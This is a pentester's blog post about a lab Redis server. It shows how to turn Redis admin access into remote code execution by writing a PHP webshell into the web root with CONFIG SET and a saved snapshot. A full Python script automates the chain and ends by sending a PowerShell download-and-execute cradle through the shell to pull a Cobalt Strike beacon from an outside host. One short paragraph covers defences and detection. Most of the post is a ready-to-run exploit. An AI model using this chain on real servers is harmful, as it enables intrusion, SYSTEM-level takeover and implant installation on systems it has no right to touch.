Redis RCE Post Exploitation

Hi Pentester,

Just had some fun in my testing lab with a Redis server. This morning, after waking up a bit early, I started my Kali Linux machine and thought about exercising my pentesting skills. I found one lab related to a Redis server that is quite interesting.

I would like to share the post-exploitation steps that follow from the access we have on the Redis server. So I assume that you already have administrator-level access to the Redis server (you know its password) and are able to connect to it remotely.

Post Exploitation

First you need to connect to the server using redis-cli and specify the IP address:

redis-cli -h 10.129.218.54

The next step is to authenticate so that you are allowed to execute Redis commands on the server:

auth [PUT YOUR PASSWORD HERE]

Once authentication is done, the next step is to change the Redis dump directory. This is the directory Redis writes its RDB snapshot into, and pointing it at the web root is what turns the snapshot into our RCE payload:

config set dir C:\xampp\htdocs\

Next, set the name of the dump file so that it becomes our PHP backdoor:

config set dbfilename grem.php

Since my Redis server also hosts a PHP-based web application from that directory, the dump file becomes a webshell called grem.php.

The next phase is to store the PHP backdoor as the value of a key. The RDB header, key metadata and checksum will surround this string in the written file, but PHP prints everything outside the <?php ... ?> tags as plain output and only executes what is inside them, so the shell still works. The file only lands on disk when Redis writes its snapshot, so if you do not want to wait for the next automatic save, issue a save command after setting the key.

set grem "<?php system($_REQUEST['me']); ?>"

Set up the foothold

As we have successfully created the backdoor, we can start using the RCE. Let's test the backdoor with the command whoami, passed in the me parameter of a request to grem.php.

Based on the result returned by the webshell, it looks like the backdoor is working perfectly, and we can see that the web server is running as NT AUTHORITY\SYSTEM.
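The whole chain above, from AUTH to the first whoami through the webshell, as an added Python example that is not part of this post and not Redis or Cobalt Strike tooling. It speaks RESP directly over a socket, so you can see exactly what redis-cli puts on the wire, which matters as much for writing the detection for this technique as for running it. It adds one step the post does not show, SAVE, which forces Redis to write its RDB snapshot immediately. The port 6379, the password s3cret, the http://10.129.218.54 base URL and the beacon download cradle at the bottom are assumptions for this lab; the host, paths and PHP payload are the post's own values.

```python
"""Redis -> PHP webshell chain from the post, spoken as raw RESP.

Added example, not the post's own commands. Assumed values: the port,
the password, the web base URL and the beacon cradle at the bottom.
"""
import socket
from urllib.parse import urlencode

REDIS_HOST = "10.129.218.54"                   # from the post
REDIS_PORT = 6379                              # assumption: default Redis port
WEBROOT = "C:\\xampp\\htdocs\\"                # from the post (XAMPP document root)
SHELL_NAME = "grem.php"                        # from the post
PAYLOAD = "<?php system($_REQUEST['me']); ?>"  # from the post


def resp_encode(*args):
    """Encode one command as a RESP array of bulk strings, exactly as redis-cli does."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode() if isinstance(arg, str) else arg
        out.append(f"${len(data)}\r\n".encode() + data + b"\r\n")
    return b"".join(out)


def parse_simple_reply(line):
    """Split a '+OK\\r\\n' or '-ERR ...\\r\\n' reply into (success, text)."""
    text = line.decode(errors="replace").rstrip("\r\n")
    if text.startswith("+"):
        return True, text[1:]
    if text.startswith("-"):
        return False, text[1:]
    raise ValueError(f"unexpected reply type: {text!r}")


def webshell_chain(password, webroot=WEBROOT, name=SHELL_NAME, key="grem"):
    """The post's command sequence, plus SAVE.

    SAVE is not shown in the post: it forces Redis to write its RDB
    snapshot now, and that write is what drops <webroot><name> on disk.
    """
    return [
        ("AUTH", password),
        ("CONFIG", "SET", "dir", webroot),
        ("CONFIG", "SET", "dbfilename", name),
        ("SET", key, PAYLOAD),
        ("SAVE",),
    ]


def send_chain(host, port, chain, timeout=5.0):
    """Send each command and collect replies; stop at the first error reply."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for cmd in chain:
            sock.sendall(resp_encode(*cmd))
            line = b""
            while not line.endswith(b"\r\n"):   # every reply in this chain is one line
                chunk = sock.recv(1)
                if not chunk:
                    raise ConnectionError("redis closed the connection")
                line += chunk
            ok, text = parse_simple_reply(line)
            replies.append((cmd[0], ok, text))
            if not ok:                           # e.g. NOAUTH, or CONFIG renamed away
                break
    return replies


def webshell_url(base_url, command, param="me"):
    """URL that runs `command` through the dropped shell; urlencode handles spaces and quotes."""
    return f"{base_url.rstrip('/')}/{SHELL_NAME}?{urlencode({param: command})}"


# Constructed stand-in for the Scripted Web Delivery one-liner; your team server
# generates the real one, with its own listener host and URI path.
BEACON_CRADLE = ('powershell.exe -nop -w hidden -c '
                 '"IEX ((New-Object Net.WebClient).DownloadString(\'http://10.10.14.5:80/a\'))"')

if __name__ == "__main__":
    import sys
    from urllib.request import urlopen
    password = sys.argv[1] if len(sys.argv) > 1 else "s3cret"   # assumption
    for name, ok, text in send_chain(REDIS_HOST, REDIS_PORT, webshell_chain(password)):
        print(f"{name:6} {'OK' if ok else 'FAIL'} {text}")
    # Foothold check from the post, then beacon delivery through the same parameter.
    print(urlopen(webshell_url(f"http://{REDIS_HOST}", "whoami")).read().decode(errors="replace"))
    print(urlopen(webshell_url(f"http://{REDIS_HOST}", BEACON_CRADLE)).read().decode(errors="replace"))
```

Two things worth knowing when you reproduce this. The dropped file is a genuine RDB dump, so the PHP tags sit between binary header and checksum bytes, and the shell only works because PHP echoes those bytes as literal output. On the defensive side, rename-command CONFIG "" in redis.conf (or an ACL that denies CONFIG) makes config set dir fail with an error reply, which is the single control that breaks this chain; a CONFIG SET dir pointing at a web root is also about as high-signal a detection as Redis traffic offers.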

Build Control

I use Cobalt Strike for the follow-on activities such as hash dumping and lateral movement. With the command execution we have above, we can deliver our beacon.

I use Scripted Web Delivery to install my beacon on the compromised host with the configuration above. Cobalt Strike generates a one-liner that you can execute on the host directly or through our RCE.

Next, run that PowerShell command through the webshell we created earlier.

After waiting less than 5 seconds, we can see that a new beacon with the highest privilege is established.
